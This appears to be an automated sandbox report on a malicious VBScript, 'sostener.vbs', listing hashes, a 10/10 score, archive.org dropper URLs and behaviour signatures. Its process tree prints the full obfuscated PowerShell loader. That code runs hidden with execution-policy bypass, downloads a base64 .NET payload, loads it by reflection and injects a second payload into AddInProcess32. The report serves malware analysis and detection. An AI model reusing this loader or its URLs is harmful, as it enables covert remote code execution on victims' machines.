Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-09-2024 08:59

General

  • Target

    sostener.vbs

  • Size

    499KB

  • MD5

    3b4164bdb4cf6c49570c95714f8c17a5

  • SHA1

    13c7abef0333088056a8c11c951c97fcb878ad96

  • SHA256

    fac857a7fa291be79831caef11498e067c036cd66812c7f1244b95b3e78a3ea4

  • SHA512

    460bf20b6d30b4314703b67356828e540db80b43e3afc37ce2d075660370a4a306659075abe4a6895039df86316d95756441e40546d8d72daef7c5c11e7155ac

  • SSDEEP

    12288:n9D/msDMDwwpZcKHg9NR4A6sgmkhf1dM4Y6ebu5Z2PqoKuN8HUe5FXNbSEKOsyTE:Sbqj

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1688
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1008

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    f029d9c92bce26181fea3cc69e176de4

    SHA1

    c09559aef3e79ab55b4a80e0e71f89ffa6eed249

    SHA256

    a9a9ffc19dd5091a881f39cbb3ae7d59b7bd7e2243e3bf17cf5fe46569b9632a

    SHA512

    4421c78cb6baa3f18437d3f19db445dcbc0898a697ce866f32b00ab59f1f875552507649fb39bcd52838f65d351ebd9465f828745c4788a20f9c3818cfc40d72

  • memory/1688-4-0x000007FEF611E000-0x000007FEF611F000-memory.dmp

    Filesize

    4KB

  • memory/1688-5-0x000000001B570000-0x000000001B852000-memory.dmp

    Filesize

    2.9MB

  • memory/1688-7-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

    Filesize

    9.6MB

  • memory/1688-6-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

  • memory/1688-8-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

    Filesize

    9.6MB

  • memory/1688-9-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

    Filesize

    9.6MB

  • memory/1688-10-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

    Filesize

    9.6MB

  • memory/1688-16-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

    Filesize

    9.6MB